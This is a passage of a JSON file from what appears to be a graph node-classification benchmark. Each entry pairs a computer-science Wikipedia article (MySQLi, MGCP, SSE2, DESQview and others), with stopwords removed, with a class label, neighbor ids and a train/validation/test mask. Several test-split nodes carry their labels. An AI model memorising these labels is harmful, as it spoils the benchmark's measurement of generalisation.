      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      2687,
      639,
      5247,
      7806,
      2179,
      10883,
      11390,
      8328,
      3722,
      4747,
      10891,
      3725,
      6797,
      10382,
      9366,
      2199,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      3235,
      6829,
      8879,
      3248,
      178,
      9907,
      11444,
      6837,
      7351,
      6329,
      8889,
      8379,
      5823,
      4801,
      8388,
      1736,
      2248,
      2250,
      9932,
      6868,
      7382,
      8410,
      9436,
      1247,
      11489,
      7907,
      1253,
      7403,
      5356,
      9455,
      1776,
      242,
      5363,
      9972,
      9466,
      2811,
      9468,
      1278,
      2304,
      10499,
      4870,
      8966,
      1801,
      10505,
      1804,
      8976,
      273,
      8977,
      787,
      9490,
      789,
      5397,
      11539,
      8474,
      3871,
      10016,
      2339,
      292,
      10235,
      2345,
      5933,
      814,
      7983,
      7986,
      2355,
      11059,
      7477,
      823,
      10040,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      4424,
      5452,
      6988,
      2383,
      5967,
      5457,
      11601,
      7507,
      11604,
      4438,
      7511,
      9563,
      5980,
      10590,
      2399,
      8545,
      3426,
      8551,
      5484,
      7020,
      6515,
      5492,
      2933,
      11635,
      1399,
      376,
      7032,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7053,
      11147,
      5008,
      7057,
      11667,
      3990,
      11675,
      8092,
      2462,
      5022,
      1954,
      421,
      1445,
      935,
      3496,
      2473,
      4521,
      9643,
      4525,
      11184,
      7601,
      8115,
      10676,
      3512,
      8122,
      6075,
      6078,
      9151,
      1474,
      11204,
      11205,
      1480,
      4040,
      8136,
      9166,
      5074,
      470,
      5080,
      477,
      5598,
      8682,
      491,
      2027,
      10730,
      10731,
      8687,
      6128,
      5105,
      499,
      2035,
      5619,
      5115
    ],
    "mask": "None"
  },
  {
    "node_id": 5841,
    "label": 1,
    "text": "MySQLi:mysqli mysqli extension mysql improved relational database driver used php scripting language provide interface mysql databases three main api options considering connecting mysql database server php code consists core optional extensions core functionality php mysql-related extensions mysqli extension mysql extension implemented using php extension framework extension typically exposes api php developer allow facilities used programmatically however extensions use php extension framework expose api php developer pdo mysql driver extension example expose api php developer provides interface pdo layer mysqli improved version older php mysql driver offering various benefits authors php scripting language recommend using mysqli dealing mysql server versions 4.1.3 newer takes advantage new functionality mysqli extension provides various benefits respect predecessor prominent according php website mysqli extension features dual interface supports procedural object-oriented programming paradigms users migrating old mysql extension may prefer procedural interface procedural interface similar old mysql extension many cases function names differ prefix mysqli functions take connection handle first argument whereas matching functions old mysql interface took optional last argument example easy migration old mysql extension mysql server supports use different transport layers connections connections use tcp/ip unix domain sockets windows named pipes hostname codice_1 special meaning bound use unix domain sockets possible open tcp/ip connection using hostname codice_1 must use codice_3 instead example special meaning localhost output hr statements executed mysqli_query mysqli_real_query mysqli_multi_query functions mysqli_query function common combines executing statement buffered fetch result set one call calling mysqli_query identical calling mysqli_real_query followed mysqli_store_result example connecting mysql buffered result sets statement execution results retrieved buffered client read row row client-side result set buffering allows server free resources associated statement results early possible generally speaking clients slow consuming result sets therefore recommended use buffered result sets mysqli_query combines statement execution result set buffering php applications navigate freely buffered results navigation fast result sets held client memory please keep mind often easier scale client scale server example navigation buffered results example output unbuffered result sets client memory short resource freeing server resources early possible keep server load low needed unbuffered results used scrolling unbuffered results possible rows read example navigation unbuffered results result set values data types mysqli_query mysqli_real_query mysqli_multi_query functions used execute non-prepared statements level mysql client server protocol command com_query text protocol used statement execution text protocol mysql server converts data result sets strings sending conversion done regardless sql result set column data type mysql client libraries receive column values strings client-side casting done convert columns back native types instead values provided php strings example text protocol returns strings default example output possible convert integer float columns back php numbers setting mysqli_opt_int_and_float_native connection option using mysqlnd library set mysqlnd library check result set meta data column types convert numeric sql columns php numbers php data type value range allows way example sql int columns returned integers example native data types mysqlnd connection option example output mysql database supports prepared statements prepared statement parameterized statement used execute statement repeatedly high efficiency basic workflow prepared statement execution consists two stages prepare execute prepare stage statement template sent database server server performs syntax check initializes server internal resources later use mysql server supports using anonymous positional placeholder see example mysql database supports stored procedures stored procedure subroutine stored database catalog applications call execute stored procedure call sql statement used execute stored procedure parameter stored procedures inout parameters depending mysql version mysqli interface special notion different kinds parameters parameter input parameters provided call statement please make sure values escaped correctly see examples mysql optionally allows multiple statements one statement string sending multiple statements reduces client-server round trips requires special handling multiple statements multi queries must executed mysqli_multi_query individual statements statement string separated semicolon result sets returned executed statements must fetched mysql server allows statements return result sets statements return result sets one multiple statement see examples mysql server supports transactions depending storage engine used since mysql 5.5 default storage engine innodb innodb full acid transaction support transactions either controlled using sql api calls recommended use api calls enabling disabling auto commit mode committing rolling back transactions examples mysql result set contains metadata metadata describes columns found result set metadata sent mysql accessible mysqli interface extension performs negligible changes information receives differences mysql server versions aligned meta data access mysqli_result interface view persistent connection support introduced php 5.3 mysqli extension support already present pdo mysql ext/mysql idea behind persistent connections connection client process database reused client process rather created destroyed multiple times reduces overhead creating fresh connections every time one required unused connections cached ready reused unlike mysql extension mysqli provide separate function opening persistent connections open persistent connection must prepend p hostname connecting problem persistent connections left unpredictable states clients example table lock might activated client terminates unexpectedly new client process reusing persistent connection get connection cleanup would need done new client process could make good use persistent connection increasing burden programmer persistent connection mysqli extension however provides built-in cleanup handling code cleanup carried mysqli includes ensures persistent connections clean state return connection pool client process uses mysqli extension cleanup automatically calling c-api function mysql_change_user automatic cleanup feature advantages disadvantages though advantage developer longer needs worry adding cleanup code called automatically however disadvantage code could potentially little slower code perform cleanup needs run time connection returned connection pool possible switch automatic cleanup code compiling php mysqli_no_change_user_on_pconnect defined",
    "neighbors": [
      8644,
      9286,
      7022,
      9780,
      2901
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5842,
    "label": 7,
    "text": "Engineered_Software_Inc.:engineered software inc engineered software inc. software publisher engineering products company based lacey washington founded 1982 company develops hydraulic analysis software specialized piping system design based mainly darcy-weisbach equation centrifugal pump selection using pump affinity rules industries served segments includes aerospace defense chemical processing engineering design consulting food beverage oil petrochemical mining metals pharmaceutical power generation pulp paper wastewater collection treatment education business segments software including saas industrial training publications technical support company one leading manufacturers windows web-based pump selection software products division split 2002 operates brand pump-flo solutions company best known consumer public manufacturer pipe-flo software pipe-flo program proprietary file extension .pipe opened programs including viewer type program uses .psv extension 2008 engineered software inc. expanded engineering products include training courses publications sold brand name fluid fundamentals training 2006 engineered software inc. entered four-year agreement crane valve north america known crane company publish technical paper number 410 tp410 crane agreed allow engineered software provide flow fluids premium software crane manual crane fluid handling later partnered engineered software rewrite crane tp410 2009 company still holds contract crane fluid handling market sell produce guide crane co. flow fluids brand 2007 company became member educational non-profit pump systems matter™ engineered software ceo ray hardee p.e. recognized 2008 hydraulic institute hi contributions hydraulic institute/pump systems matter committee led publication optimizing pumping systems guidebook ops company ceo also member committee wrote standard asme ea-2-2009 energy assessment pumping systems author piping system fundamentals complete guide gaining clear picture piping system",
    "neighbors": [
      467
    ],
    "mask": "None"
  },
  {
    "node_id": 5843,
    "label": 5,
    "text": "Media_Gateway_Control_Protocol:media gateway control protocol media gateway control protocol mgcp signaling call control communications protocol used voice ip voip telecommunication systems implements media gateway control protocol architecture controlling media gateways internet protocol ip networks connected public switched telephone network pstn protocol successor simple gateway control protocol sgcp developed bellcore cisco internet protocol device control ipdc methodology mgcp reflects structure pstn power network residing call control center softswitch analogous central office telephone network endpoints low-intelligence devices mostly executing control commands call agent media gateway controller softswitch providing result indications response protocol represents decomposition voip models h.323 session initiation protocol sip endpoint devices call higher levels signaling intelligence mgcp text-based protocol consisting commands responses uses session description protocol sdp specifying negotiating media streams transmitted call session real-time transport protocol rtp framing media streams media gateway control protocol architecture methodologies programming interfaces described rfc 2805 mgcp master-slave protocol media gateways mgs controlled call control agent softswitch controller called media gateway controller mgc call agent ca network protocol control specific port media gateway facilitates centralized gateway administration provides scalable ip telephony solutions distributed system composed least one call agent one usually multiple media gateways performs conversion media signals circuit-switched packet-switched networks least one signaling gateway sg connected pstn mgcp presents call control architecture limited intelligence edge endpoints media gateways intelligence core controllers mgcp model assumes call agents synchronize send coherent commands responses gateways control call agent uses mgcp request event notifications reports status configuration data media gateway well specify connection parameters activation signals toward pstn telephony interface softswitch typically used conjunction signaling gateways access signalling system 7 ss7 functionality example call agent use mgcp control signaling gateway rather sigtran protocols used backhaul signaling signaling gateway call agents typically media gateway may configured list call agents may accept control commands principle event notifications may sent different call agents endpoint gateway according instructions received call agents setting notifiedentity parameter practice however usually desirable endpoints gateway controlled call agent call agents available provide redundancy event primary call agent fails loses contact media gateway event failure backup call agent responsibility reconfigure media gateway reports backup call agent gateway may audited determine controlling call agent query may used resolve conflicts case multiple call agents mgcp assumes maintain knowledge device state among failover features take account planned unplanned outages mgcp recognizes three essential elements communication media gateway controller call agent media gateway endpoint connections entities media gateway may host multiple endpoints endpoint able engage multiple connections multiple connections endpoints support calling features call waiting three-way calling mgcp text-based protocol using command response model commands responses encoded messages structured formatted whitespace characters space horizontal tab carriage return linefeed colon full stop messages transmitted using user datagram protocol udp media gateways use port number 2427 call agents use 2727 default message sequence command request response known transaction identified numerical transaction identifier exchanged transaction protocol specification defines nine standard commands distinguished four-letter command verb auep aucx crcx dlcx epcf mdcx ntfy rqnt rsip responses begin three-digit numerical response code identifies outcome result transaction two verbs used call agent query state endpoint associated connections three verbs used call agent manage connection media gateway endpoint one verb used call agent request notification events occurring endpoint apply signals connected pstn network link connected telephony endpoint e.g. telephone one verb used endpoint indicate call agent detected event call agent previously requested notification rqnt command one verb used call agent modify coding characteristics expected line side endpoint one verb used endpoint indicate call agent process restarting another implementation media gateway control protocol architecture h.248/megaco protocol collaboration internet engineering task force rfc 3525 international telecommunication union recommendation h.248.1 protocols follow guidelines overlying media gateway control protocol architecture described rfc 2805 however protocols incompatible due differences protocol syntax underlying connection model",
    "neighbors": [
      7681,
      10242,
      1030,
      8211,
      6681,
      6682,
      10271,
      6177,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6723,
      8265,
      4687,
      10341,
      614,
      10344,
      3695,
      4723,
      2679,
      4729,
      5251,
      649,
      9868,
      3218,
      9365,
      11413,
      152,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      6318,
      9909,
      4793,
      7865,
      4797,
      702,
      8386,
      7364,
      8905,
      1229,
      10461,
      7391,
      6880,
      3297,
      2797,
      751,
      7407,
      8432,
      8946,
      8437,
      3322,
      9987,
      3847,
      10005,
      5402,
      5405,
      9511,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      849,
      6993,
      1876,
      5972,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      871,
      11112,
      361,
      367,
      891,
      6524,
      11647,
      10115,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      6567,
      9131,
      6577,
      2996,
      10171,
      3006,
      9670,
      5576,
      2509,
      8669,
      8670,
      10723,
      10727,
      3564,
      9711,
      6651,
      3580,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 5844,
    "label": 3,
    "text": "SSE2:sse2 sse2 streaming simd extensions 2 one intel simd single instruction multiple data processor supplementary instruction sets first introduced intel initial version pentium 4 2000 extends earlier sse instruction set intended fully replace mmx intel extended sse2 create sse3 2004 sse2 added 144 new instructions sse 70 instructions competing chip-maker amd added support sse2 introduction opteron athlon 64 ranges amd64 64-bit cpus 2003 sse2 instructions implement integer vector operations also found mmx instead mmx registers use xmm registers wider allow significant performance improvements specialized applications another advantage replacing mmx sse2 avoiding mode switching penalty issuing x87 instructions present mmx sharing register space x87 fpu sse2 also complements floating-point vector operations sse instruction set adding support double precision data type sse2 extensions include set cache control instructions intended primarily minimize cache pollution processing infinite streams information sophisticated complement numeric format conversion instructions amd implementation sse2 amd64 x86-64 platform includes additional eight registers doubling total number 16 xmm0 xmm15 additional registers visible running 64-bit mode intel adopted additional registers part support x86-64 architecture intel parlance intel 64 2004 fpu x87 instructions provide higher precision calculating intermediate results 80 bits precision default minimise roundoff error numerically unstable algorithms see ieee 754 design rationale references therein however x87 fpu scalar unit whereas sse2 process small vector operands parallel codes designed x87 ported lower precision double precision sse2 floating point certain combinations math operations input datasets result measurable numerical deviation issue reproducible scientific computations e.g calculation results must compared results generated different machine architecture related issue historically language standards compilers inconsistent handling x87 80-bit registers implementing double extended precision variables compared double single precision formats implemented sse2 rounding extended precision intermediate values double precision variables fully defined dependent implementation details registers spilled memory sse2 extends mmx instructions operate xmm registers therefore possible convert existing mmx code sse2 equivalent since sse2 register twice long mmx register loop counters memory access may need changed accommodate however 8 byte loads stores xmm available strictly required although one sse2 instruction operate twice much data mmx instruction performance might increase significantly two major reasons accessing sse2 data memory aligned 16-byte boundary incur significant penalty throughput sse2 instructions older x86 implementations half mmx instructions intel addressed first problem adding instruction sse3 reduce overhead accessing unaligned data improving overall performance misaligned loads last problem widening execution engine core microarchitecture core 2 duo later products since mmx x87 register files alias one another using mmx prevent x87 instructions working desired mmx used programmer must use emms instruction c _mm_empty restore operation x87 register file operating systems x87 used much may still used critical areas like pow extra precision needed cases corrupt floating-point state caused failure emit emms may go undetected millions instructions ultimately causing floating-point routine fail returning nan since problem locally apparent mmx code finding correcting bug time consuming sse2 problem usually provides much better throughput provides registers 64-bit code preferred nearly vectorization work first introduced 2000 sse2 supported software development tools example use sse2 microsoft visual studio project programmer either manually write inline-assembly import object-code external source later visual c++ processor pack added sse2 support visual c++ masm intel c++ compiler automatically generate sse4 ssse3 sse3 sse2 sse code without use hand-coded assembly since gcc 3 gcc automatically generate sse/sse2 scalar code target supports instructions automatic vectorization sse/sse2 added since gcc 4 sun studio compiler suite also generate sse2 instructions compiler flag -xvector=simd used since microsoft visual c++ 2012 compiler option generate sse2 instructions turned default sse2 extension ia-32 architecture based x86 instruction set therefore x86 processors include sse2 amd64 architecture supports ia-32 compatibility mode includes sse2 specification also doubles number xmm registers allowing better performance sse2 also requirement installing windows 8 later microsoft office 2013 later enhance reliability third-party apps drivers running windows 8 following ia-32 cpus support sse2 following ia-32 cpus released sse2 developed implement",
    "neighbors": [
      4108,
      5649,
      2088,
      1085,
      7234,
      3142,
      8795,
      5725,
      2655,
      1119,
      1122,
      7783,
      4204,
      1137,
      9337,
      4217,
      1664,
      10375,
      4237,
      6804,
      8853,
      8855,
      9369,
      9391,
      2237,
      5309,
      6339,
      5326,
      9428,
      725,
      10985,
      5356,
      9964,
      5358,
      8944,
      3317,
      9976,
      5883,
      5380,
      2821,
      1798,
      8452,
      6924,
      8976,
      4886,
      3352,
      9500,
      8506,
      833,
      6978,
      5444,
      9541,
      11080,
      9582,
      1399,
      1915,
      10620,
      10624,
      3459,
      3973,
      4491,
      9611,
      9612,
      6038,
      9111,
      7071,
      8609,
      8624,
      8120,
      8125,
      8126,
      10689,
      6596,
      1998,
      977,
      2514,
      5073,
      5078,
      1000,
      7657,
      8680,
      8684,
      499,
      4603,
      3070,
      3071
    ],
    "mask": "Test"
  },
  {
    "node_id": 5845,
    "label": 9,
    "text": "First-generation_programming_language:first-generation programming language first generation programming language 1gl grouping programming languages machine level languages used program first-generation computers originally translator used compile assemble first-generation language first-generation programming instructions entered front panel switches computer system instructions 1gl made binary numbers represented 1s 0s makes language suitable understanding machine far difficult interpret learn human programmer main advantage programming 1gl code run fast efficiently precisely instructions executed directly central processing unit cpu one main disadvantages programming low level language error occurs code easy fix first generation languages much adapted specific computer cpu code portability therefore significantly reduced comparison higher level languages modern day programmers still occasionally use machine level code especially programming lower level functions system drivers interfaces firmware hardware devices modern tools native-code compilers used produce machine level higher-level language 1 nwankwogu s.e 2016 programming languages history",
    "neighbors": [
      9345,
      2691,
      9224,
      5651,
      5527,
      9626,
      3613,
      1952,
      4770,
      5680,
      305,
      9780,
      1591,
      4410,
      191,
      10819,
      8262,
      9926,
      4042,
      477,
      7395,
      4838,
      1776,
      9330,
      9331,
      2556,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 5846,
    "label": 9,
    "text": "Comparison_of_JavaScript_charting_libraries:comparison javascript charting libraries different javascript charting libraries available comparison features available",
    "neighbors": [
      8384,
      803,
      3462,
      7871
    ],
    "mask": "Test"
  },
  {
    "node_id": 5847,
    "label": 4,
    "text": "OpenStego:openstego openstego open source steganography tools developed samir vaidya released gnu general public license version 2 gplv2 tools detect data hidden openstego",
    "neighbors": [
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 5848,
    "label": 7,
    "text": "Multicloud:multicloud multicloud use multiple cloud computing storage services single heterogeneous architecture also known polynimbus cloud strategy also refers distribution cloud assets software applications etc across several cloud-hosting environments typical multicloud architecture utilizing two public clouds well multiple private clouds multicloud environment aims eliminate reliance single cloud provider differs hybrid cloud refers multiple cloud services rather multiple deployment modes public private legacy also multicloud environment synchronization different vendors essential complete computation process unlike parallel computing distributed computing environments example enterprise may concurrently use separate cloud providers infrastructure iaas software saas services use multiple infrastructure iaas providers latter case may use different infrastructure providers different workloads deploy single workload load balanced across multiple providers active-active deploy single workload one provider backup another active-passive number reasons deploying multicloud architecture including reducing reliance single vendor cost-efficiencies increasing flexibility choice adherence local policies require certain data physically present within area/country geographical distribution processing requests physically closer cloud unit turn reduces latency mitigating disasters similar use best-of-breed applications multiple developers personal computer rather defaults offered operating system vendor recognition fact one provider everything everyone various issues also present multicloud environment security governance complicated moving parts may create resiliency issues selection right cloud products services also present challenge users may suffer paradox choice",
    "neighbors": [
      4194,
      3366,
      5770,
      4429,
      467,
      8986,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 5849,
    "label": 8,
    "text": "Mod_wsgi:mod wsgi mod_wsgi apache http server module graham dumpleton provides wsgi compliant interface hosting python based web applications apache version 4.5.3 mod_wsgi supports python 2 3 starting 2.6 3.2 alternative mod_python cgi fastcgi solutions python-web integration first available 2007 later versions mod_wsgi may installed one two ways original way apache module commonly used many languages v4 'mod_wsgi express method also supported installed python module using setup.py pip without needing manual intervention apache configuration method simplifies installation python developers familiar python apache also advantages virtualization creates local environment without affecting system settings requiring root access install",
    "neighbors": [
      1802,
      10506,
      9229,
      11154,
      1556,
      10020,
      10026,
      7212,
      10284,
      4658,
      2485,
      1468,
      4797,
      8644,
      11466,
      3920,
      5593,
      6366,
      865,
      7784,
      8554,
      9834,
      8689,
      9841,
      124,
      9726
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5850,
    "label": 1,
    "text": "Event_condition_action:event condition action event condition action eca short-cut referring structure active rules event driven architecture active database systems rule traditionally consisted three parts structure used early research active databases started use term eca current state art eca rule engines use many variations rule structure also features considered early research introduced strategies event selection event part memory-based rule engine condition could tests local data actions could updates object attributes database system condition could simply query database result set null passed action part changes database either case actions could also calls external programs remote procedures note database usage updates database regarded internal events consequence execution action part active rule match event part another active rule thus triggering equivalent memory-based rule engine would invoke external method caused external event trigger another eca rule eca rules also used rule engines use variants rete algorithm rule processing",
    "neighbors": [
      6959
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5851,
    "label": 3,
    "text": "Aleste:aleste story aleste concerns manmade supercomputer dia 51 infected hybrid virus spreading like wildfire eventually leading dia 51 eliminate human race yuri ray girlfriend gets injured dia assault raymond waizen reason world get rid dia 51 aleste fighter game originally released master system february 1988 version released outside japan power strike us release mail-only limited edition european release normal retail package msx2 version released july year featuring two new stages lowered difficulty series cutscenes version game released phones square enix presumably based msx2 version msx2 version rereleased nintendo wii virtual console service japan along aleste 2 also rereleased now-defunct woomb service aleste followed several sequels also number similar games various aleste entries based example gunhed would inspire super aleste finally known around 1993 various employees left compile joined raizing made similar games",
    "neighbors": [
      6793,
      11564,
      5677,
      9006,
      10931
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5852,
    "label": 9,
    "text": "Robert_Bruce_Findler:robert bruce findler robert bruce findler colloquially known robby american computer scientist currently professor electrical engineering computer science northwestern university also member plt group responsible creation maintenance drracket addition drracket findler contributed numerous components racket supervises web-based software library called planet findler also leading team member programbydesign project findler received phd rice university direction matthias felleisen dissertation linguistics software contracts popularly known design contract work software contracts provides careful accounting blame thereby helping programmers quickly home faulty part software system addition drracket software contracts findler focuses design implementation workbench semantics engineers workbench called redex tool specifying executing reduction semantics programming language used programming language researchers us europe recently sun fortress research team used redex specify explore key parts language findler served semantics editor revised^6 report scheme programming language phd student jacob matthews developed redex model core semantics included appendix report appendix plays role standard ml formal specification milner tofte harper macqueen executable thus visualize individual examples",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      5751,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      8262,
      7880,
      8908,
      1613,
      205,
      5837,
      11218,
      9299,
      10712,
      3034,
      3675,
      219,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      7148,
      5360,
      5361,
      8435,
      3446,
      1783,
      6906,
      7805
    ],
    "mask": "Test"
  },
  {
    "node_id": 5853,
    "label": 3,
    "text": "Flex_machine:flex machine flex computer system developed michael foster ian currie royal signals radar establishment rsre malvern england late 1970s 1980s used tagged storage scheme implement capability architecture designed safe efficient implementation strongly typed procedures hardware custom microprogrammable operating system modular compiler editor garbage collector filing system written algol 68rs least two incarnations flex implemented using hardware writable microcode first supplied logica rsre design second used icl perq microcode alone responsible storage allocation deallocation garbage collection immediately precluded whole class errors arising misuse deliberate accidental pointers notable feature flex tagged write-once filestore allowed arbitrary code data structures written retrieved transparently without recourse external encodings data could thus passed safely program program similar way remote capabilities allowed data procedures machines accessed network connection without application program involved external encodings data parameters result values whole scheme allowed abstract data types safely implemented data items procedures permitted access could bound together resulting capability passed freely around capability would grant access procedures could used way obtain access data another notable feature flex notion shaky pointers recently often called weak references points blocks memory could freed next garbage collection used example cached disc blocks list spare procedure work-spaces comflex packet switching network capable transmitting data magnetic-disc speed developed alongside flex made feasible use remote file-stores remote capabilities remote procedure calls",
    "neighbors": [
      2304,
      9441,
      9762,
      2179,
      5220,
      7173,
      2951,
      1611,
      9643,
      6675,
      7480,
      2395,
      541
    ],
    "mask": "None"
  },
  {
    "node_id": 5854,
    "label": 3,
    "text": "Super_Cobra:super cobra super cobra horizontally scrolling shooter developed konami originally released coin-operated arcade game 1981 published konami japan march 1981 manufactured distributed stern north america june 22 1981 sequel 1981 scramble arcade game game commercial success selling 12,337 arcade cabinets united states four months october 2 1981 becoming stern third best-selling arcade classic berzerk scramble scramble sold 15,136 cabinets u.s. five months earlier year adding 27,473 u.s. cabinet sales super cobra widely ported parker brothers adventure vision standalone versions entex player controls helicopter tight caverns slightest misstep result loss life however unlike scramble game continued player left adding credits machine may usually offer option others n't player loses points upon continuing joystick accelerates decelerates moves moves helicopter uses laser bomb destroy defenders tanks ufos infiltrating 10 super cobra defense systems ship limited fuel supply depleted time fuel acquired destroying fuel tanks game game divided ten sections plus finale different style terrain different obstacles players navigate ten levels base must safely make level remove booty levels described follows intermission section game simply scrolls new terrain player destroys booty final level must start back beginning level booty safely carried away player starts back beginning first level cycle repeats second time levels tanks fire much aggressively fuel consumed much faster third subsequent times levels fuel consumed still faster faster rate fuel consumption second subsequent cycles may make difficult complete cycles without losing least one chopper due running fuel although compensated somewhat awarding extra chopper time cycle completed booty carried away game ported atari 2600 atari 5200 colecovision intellivision odyssey² atari 8-bit family parker brothers released also sord m5 msx entex adventure vision entex also made standalone tabletop version game arcade express november 1982 gave adventure vision port score 9 10 concluded takes real skill master represents state-of-the-art scrolling shoot-outs atari 2600 version awarded certificate merit category best action videogame 5th annual arkie awards 1983 compared vanguard said provides brand relentless multi-scenario action super cobra appeared alongside scramble retro compilation konami arcade classics released sony playstation 1999 made available microsoft defunct game room service march 24 2010",
    "neighbors": [
      1776,
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5855,
    "label": 7,
    "text": "Andrew_Project:andrew project andrew project distributed computing environment developed carnegie mellon university cmu beginning 1982 ambitious project time resulted unprecedentedly vast accessible university computing infrastructure information technology center partnership carnegie mellon ibm began work andrew project 1982 initial phase project involved software hardware including wiring campus data developing workstations distributed students faculty cmu elsewhere proposed 3m computer workstations included million pixel display megabyte memory running million instructions per second unfortunately cost order us 10,000 made computers beyond reach students budgets initial hardware deployment 1985 established number university-owned clusters public workstations various academic buildings dormitories campus fully wired ready eventual availability inexpensive personal computers early development within information technology center originally called vice vast integrated computing environment virtue virtue reached unix emacs focused centralized tools file server workstation tools including window manager editor email file system client code initially system prototyped sun microsystems machines ibm rt pc series computers running special ibm academic operating system people involved project included james h. morris nathaniel borenstein james gosling david s. h. rosenthal project extended several times 1985 order complete software renamed andrew andrew carnegie andrew mellon founders institutions eventually became carnegie mellon university mostly rewritten result experience early deployments andrew four major software components afs moved information technology center transarc 1988 ams fully decommissioned replaced cyrus imap server 2002 ibm funding ended andrew continued open source project named andrew user interface system auis set tools allows users create distribute documents containing variety formatted embedded objects open-source project run department computer science cmu andrew consortium governs maintains development distribution andrew user interface system andrew user interface system encompasses three primary components andrew user environment aue contains main editor help system user interface tools rendering multimedia embedded objects andrew toolkit atk contains formattable embeddable objects allows method developers design objects atk allows multi-level object embedding objects embedded one another example raster image object embedded spreadsheet object andrew message system ams provides mail bulletin board access allows user send receive organize mail well post read message boards version 6.3 following components auis wireless andrew first campus-wide wireless internet network built 1993 predating wi-fi branding wireless andrew 2-megabit-per-second wireless local area network connected access points wired andrew network high-speed ethernet backbone linking buildings across cmu campus wireless andrew consists 100 access points covering six buildings campus university tested current setup 40 mobile units allowing general use researchers students february 1997",
    "neighbors": [
      9665,
      7337,
      7561,
      3826,
      8179,
      7188,
      10680,
      3323,
      4092
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5856,
    "label": 2,
    "text": "DESQview:desqview desqview dv text mode multitasking operating environment developed quarterdeck office systems enjoyed modest popularity late 1980s early 1990s running top dos allowed users run multiple programs concurrently multiple windows quarterdeck predecessor desqview task switching product called desq shipped late april may 1984 allowed users switch running programs quarterdeck revamped package bringing multitasking adding topview compatibility desqview released july 1985 four months microsoft released first version windows widely thought first program bring multitasking windowing capabilities dos fact predecessor ibm topview shipped march 1985 desqview inherited pop-up menu desqview well-behaved dos programs could run concurrently resizable overlapping windows something first version ms windows could simple hideable menu allowed cutting pasting programs desqview provided support simple editable macros well quarterdeck also developed set optional utilities desqview including notepad dialer later versions allowed graphics mode programs loaded well run full screen mode desqview gui graphical user interface operating system rather non-graphical windowed shell ran real mode top dos although could run intel 8086- intel 80286-based pc could also use expanded memory add-ons work around 640 kb ram limit conventional memory early pcs desqview really came intel 80386 machines better utilizing memory dos limit however either case ran real mode rather protected mode meaning misbehaving program could still crash system make maximum use extended memory intel 80386 processors transforming expanded memory upper memory blocks umbs accessible desqview real-mode programs quarterdeck developed sophisticated memory manager owing foresight marketing manager quarterdeck marketed separate product qemm-386 quarterdeck expanded memory manager 386 became popular desqview sold steadily many years generating us 150 million sales 1987 1994 release intel pentium processor 386 qemm dropped combination package desqview qemm-386 called desqview 386 dv386 introduction 80386 memory management features enhanced allow system shifted protected mode also allowing addresses configured virtual 8086 mode extended memory could mapped addressing frames accessible real-mode programs dos allowed 386 implement lim lotus intel microsoft ems expanded memory specification memory manager easily controlled user dos program qemm.com desqview able use qemm features far beyond lim ems api mapping conventional address space 640 kb multiple extended memory blocks could execute transparently context main copy dos device networking drivers loaded desqview resulting space largest single program could run desqview qemm could run many instances programs ems would allow 8 mb system could generally dozen full-sized dos programs running concurrently 16 mb system could run twenty desqview noteworthy supported common dos-compatible programs achieved degree performance stability remarkable given constraints host operating system also clever interface generally unobtrusive quickly available easy learn normal pcs include keyboard three shift modifier keys control alt normal shift keys keys normally held combination keys desqview default monitored alt key isolated presses combination pressing alt key would bring desqview menu allowing access program features start new tasks switch among mark text screen paste text input current task resize move text windows configure new menu items etc addition shift+alt combination would cause desqview learn set keys macro allowed desqview run programs without interfering keybindings might using desqview critically acclaimed many fans never met mass appeal despite quarterdeck sustained efforts win people one area however desqview lasting success many multiuser bulletin board systems based thanks modest hardware requirements robust multitasking superlative handling multiple communication ports free inexpensive bbs software time ran single-node single-tasking dos program normally one copy bbs software could run limiting host pc running one node desqview allowed multiple copies single-task programs run computer allowing anyone even unimpressive hardware run large powerful multiuser bbs home desqview provide graphical user interface gui quarterdeck provide suites programming libraries utilities support development software use features never became widely popular desqview ability run software modification cost run-time licenses combined costs development suites made unreasonable combination commercial shrink-wrapped software publishers vendors microsoft released ms windows version 3.0 memory management multitasking features desqview far faster smaller stable expensive n't include support graphical features ms windows decline qemm started bundling memory manager digital research dr dos 5.0 released 1990 catch microsoft included emm386 ms-dos 5.0 previously memory management functionality available windows qemm could still used instead notably windows 3.1x provided incremental benefits sales qemm declined august 1994 three quarters losses company laid 25 employees ceo president founder terry myers resigned users moved desqview platforms notably windows 3.x os/2 third party utility authors wrote utility programs emulated desqview api functions allow suitably equipped dos programs co-operate os notable tame windows os/2speed os/2 quarterdeck eventually also released product named desqview/x dvx x window system server running dos desqview thus provided gui x software mostly unix could ported desqview/x three window managers launched x/motif open look twm default package contained twm others costly optional extras ability interact tcp/ip networks mosaic ported dvx dvx could serve dos programs 16-bit windows environment across network x programs made useful wished run dos windows programs unix workstations functionality available ncd wincenter internetworking company novell developed product called netware access server nas incorporating features desqview 386 pcanywhere desqview multitasking support used create environment 16 pc macintosh clients could login remotely access netware services run dos applications desqview development continued parallel desqview/x ceasing development desqview/x another version desqview released qemm still developed discontinuation desqview version compatible windows 